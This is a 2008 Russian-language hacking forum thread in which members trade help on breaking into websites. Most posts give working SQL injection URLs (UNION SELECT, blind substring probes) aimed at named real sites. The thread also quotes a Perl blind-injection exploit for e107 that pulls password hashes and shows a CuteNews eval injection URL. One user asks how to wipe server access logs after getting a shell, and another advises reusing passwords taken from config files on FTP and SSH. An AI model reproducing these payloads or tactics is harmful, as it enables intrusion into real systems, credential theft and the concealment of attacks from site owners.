Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. .acme

    .acme Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    126
    Likes Received:
    36
    Reputations:
    4
    where not summ10 = ""
     
    1 person likes this.
  2. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Делаю +from+table_name+where+not+summ10=""/*
    Ошибка. Не получается.
    Если делать так
    +from+customers+where+summ10=271/* (значение 271 присутсвует в summ10) то выводит поле со всеми данными этой таблицы. Но мне надо всех, где значение summ10 не пустое..
     
    #3582 Imperou$, 10 Nov 2008
    Last edited: 10 Nov 2008
  3. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    +union+select+1,2,concat(summ1,0x3a3a,summ2,0x3 a 3a,summ3,0x3a3a,summ4,0x3a3a,summ5,0x3a3a,summ6,0x 3a3a,summ7,0x3a3a,summ8,0x3a3a,summ9,0x3a3a,summ10 ),4,5,6,7,8,9,10+from+table_name+where+summ10+<>+0/*
     
    2 people like this.
  4. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    [Raz0r]
    Огромное спасибо! Вышло! =)
    Очень признателен.
     
    1 person likes this.
  5. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    ***.com/index.php?pid=-1'+union+select+1,2,3,4,5,6,7--

    Ошибку выводит

    You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7--'' at line 1

    Число столбцов определил "order by"
    Что делать не представляю
     
  6. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    diznt попробуй вместо -- подставить /* или вообше там ниче неставь.А вообше кидай сюда линк на сайт если ниче страшного там нет , а люди посотрят что можно сделать :)
     
  7. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Вот линк собственно

    http://hipergroup.com/products.php?lv=3&cate=1&type=25&pid='&language=ru
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Третья ветка
    http://hipergroup.com/products.php?lv=3&cate=1&type=25&pid=1'+and+substring(version(),1,1)=3/*&language=1
     
    1 person likes this.
  9. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    сорри. продублирую

    есть уязвимость "e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit"
    вот эксплоит: http://www.securitylab.ru/poc/extra/361578.php

    После того, как изменил $benchmark, вроде заработало, но теперь выдаёт такое:
    Code:
    [+] e107 <= 0.7.13 Blind SQL Injection
    [+] Admin/User's Password Retrieve Exploit
    [+] Coded by __GiReX__
    
    [+] Logged in with your account..
    [+] Checking database delay, please wait..
    
    [+] Normal delay: 1
    [+] Benchmark delay: 13
    
    [+] Victim password: f
    
    [-] Exploit mistake: please re-check benchmark
    
    Я так понимаю, загвоздка где-то здесь:
    Code:
    for(my $j = 1; $j <= 32; $j++)
    {  
        foreach $char(@cset)
        {    
            info(chr($char), $hash, "password");
            
            my ($pre_time, $post_time) = time();
            $rv = check_char($char, $j, "user_password");    
            $post_time = time();
        
                 if($rv and ($post_time - $pre_time) > ($ndelay + 3))
                 {        
                     $hash .= chr($char);
                     last;
                 }
        }
        
        last if $j != length($hash);
    }    
    
    if(not defined $hash or length($hash) != 32)
    {
        print STDOUT "\n\n[-] Exploit mistake: please re-check benchmark\n";
        exit;
    }
    
    Изменил строку "if(not defined $hash or length($hash) != 32)" на "if(not defined $hash)" и скрипт мне выдал:
    Code:
    
    ...
    [+] Logged in with your account..
    [+] Checking database delay, please wait..
    
    [+] Normal delay: 1
    [+] Benchmark delay: 13
    
    [+] Victim password: f
    
    [+] You can try to login with this cookie:
    [+] Cookie: e107cookie=1.d41d8cd98f00b204e9800998ecf8427e
    
    Я подставил эти куки, но они не подходят. потом попробовал эксплоит на localhoste и до меня дошло, что он всегда выдаёт один и тот же хэш. В нём зашифрован пароль "".
    Так что же делать? как заставить скрипт работать? подскажите плиз, я не бум-бум.
     
  10. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    почему не катит?:

    http://www.ascon.kz/index.php?news=144+and+lower(substr((SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1,1),1,1))='c'
     
  11. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    гхм))
    http://www.ascon.kz/index.php?news=-1+union+select+1,2,3,4,5,6/*
     
    1 person likes this.
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    А зачем изврат-то? Скуль вроде обычный.

    Не катит потому, что ковычки фильтруются
    Попробуй:
    http://www.ascon.kz/index.php?news=144+union+select+1,2,3,'44',5,6/*

    а вот так покатит, если нужен подзапрос:

    http://www.ascon.kz/index.php?news=144+and+ascii(lower(substr((SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1,1),1,1)))=99

    99 это 'с' как ты понимаешь , тренируешься? :)
     
    1 person likes this.
  13. Flash-ICE

    Flash-ICE Banned

    Joined:
    11 Nov 2007
    Messages:
    13
    Likes Received:
    5
    Reputations:
    -5
    Народ нужна ваша помощь! Именно от вас зависит моя судьба!

    И так имееться шелл, я могу ходить по всем папкам... нужно перезаписать или удалить в папке /logs файлы error.log и access.log
    я не могу их просто так удалить или перезаписать то есть там стоят прова чтобы незя было записыватЬ! что делать?!
     
  14. none222

    none222 Guest

    Reputations:
    0
    вытяни пароли из конфигов и попробуй их подставить к ФТП и ССХ
     
  15. Flash-ICE

    Flash-ICE Banned

    Joined:
    11 Nov 2007
    Messages:
    13
    Likes Received:
    5
    Reputations:
    -5
    неа не подходит
     
  16. tbody

    tbody Member

    Joined:
    7 Jul 2007
    Messages:
    18
    Likes Received:
    8
    Reputations:
    -9
    Здраствуйте!
    у меня вопрос

    http://www.gamingtrend.com/GameInfo/GameInfo.php?GameID=7889+order+by+6--
    выдает страничку,
    а http://www.gamingtrend.com/GameInfo/GameInfo.php?GameID=7889+order+by+7--
    ошибку.
    Но запрос вида http://www.gamingtrend.com/GameInfo/GameInfo.php?GameID=7889+union+select+1,2,3,4,5,6-- не работает.
    Объясните чайнику :)
     
  17. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    Блин ЛЮДИИИ ПОМОГИТЕЕ!! Не знаю чё делать ващееееее.
    https://forum.antichat.ru/showpost.php?p=935746&postcount=3618
     
  18. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    не работает сплоит, есть мыди почему?

    cutenews 1.1.1 (strawbery)

    http://nkregion.kz/news2/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=phpinfo();
     
  19. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    http://ava4me.ru/ Кто знает чтоза скрипт и где его взять?
     
  20. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Ты по ссылке вапше ходил?
    Там вапшет 32таблицы!
    Я шяс с моба...буду за компом,запостю правильную линку...
     
Thread Status:
Not open for further replies.